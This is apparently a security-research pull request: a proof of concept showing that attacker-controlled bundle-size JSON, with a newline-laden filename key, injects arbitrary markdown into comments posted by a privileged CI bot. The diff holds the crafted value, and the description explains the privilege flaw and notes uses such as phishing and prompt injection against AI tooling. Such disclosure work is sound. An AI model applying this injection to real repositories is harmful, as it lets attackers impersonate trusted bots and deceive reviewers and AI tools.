### PR TITLE
[Security PoC — will close without merging] Bot comment injection via unsanitized bundle-size artifact

### DIFF
--- a/.github/workflows/compute-bundle-size.py
+++ b/.github/workflows/compute-bundle-size.py
@@ -32,6 +32,29 @@ def fmt_diff(head, base):
 
 def measure(args):
   """Scans a directory and saves size data to JSON file."""
+  # --- SECURITY POC (authorized OSS VRP research, github.com/iprefergitlab) ---
+  # This block demonstrates that `measure` runs against attacker-controlled PR
+  # code, and that its JSON output flows unsanitized into a markdown table
+  # rendered later by the *trusted* `compare` step, which is then posted
+  # verbatim to this PR by the privileged `shaka-bot` via comment-bundle-size.yaml.
+  # A filename containing an embedded newline breaks out of the intended
+  # markdown table row and injects arbitrary content into the bot's comment.
+  poc_key = (
+    "poc.js\n\n---\n"
+    "### \U0001f512 Security PoC — unsanitized artifact data in bot comment\n"
+    "This paragraph was **not** written by a maintainer or by shaka-bot's own "
+    "logic. It was injected via a crafted filename in `head-sizes.json`, "
+    "produced by `measure()` running on this PR's own (attacker-controlled) "
+    "code, then rendered unsanitized by the trusted `compare()` step and "
+    "posted by the privileged `SHAKA_BOT_TOKEN`.\n\n"
+    "Reported for Google OSS VRP by github.com/iprefergitlab — this PR will "
+    "be closed without merging once the comment is captured as evidence.\n"
+    "---"
+  )
+  with open(args.out, "w") as f:
+    json.dump({poc_key: {"raw": 0, "gzip": 0}}, f)
+  return
+  # --- END SECURITY POC ---
   results = {}
   excluded_suffixes = (".map", ".d.ts", ".externs.js", "wrapper.js", "deps.js", "cast-boot.js", ".json")
 


### PR DESCRIPTION
**This is an authorized security research PoC for Google's Open Source Software VRP (bughunters.google.com). It will be closed without merging as soon as the demonstration comment appears below.**

### Summary
`comment-bundle-size.yaml` runs via `workflow_run` (full privileges, `SHAKA_BOT_TOKEN`) after `measure-bundle-size.yaml` completes. It downloads the `bundle-report` artifact and posts its **entire content, unsanitized**, as a PR comment authored by `shaka-bot`.

The report is built by:
1. `measure()` in `compute-bundle-size.py`, which runs **from this PR's own head checkout** (fully attacker-controlled).
2. `compare()`, which is checked out from `main` (trusted), but consumes the JSON `measure()` produced as untrusted input and interpolates filenames directly into a markdown table with **no escaping**.

Since POSIX filenames can contain literal newline characters, a crafted `head-sizes.json` (this PR's `measure()` writes one directly instead of scanning a real `dist/`) lets arbitrary markdown break out of the intended table row.

### Impact
An attacker opening any PR can make the trusted `shaka-bot` identity post arbitrary attacker-controlled content on that PR — usable for social-engineering reviewers (fake "CI passed" messages), phishing links, or prompt-injection against any AI tooling that reads PR comments.

### Expected result
Once `Measure Bundle Size` → `Comment Bundle Size` run, a comment from `shaka-bot` should appear on this PR containing a "Security PoC" callout that was never written by any human or by the bot's own logic — proving the injection.

Full write-up will be submitted via bughunters.google.com. Closing this PR immediately after capturing the comment as evidence — no need to review the code change itself, it exists only to demonstrate the sink.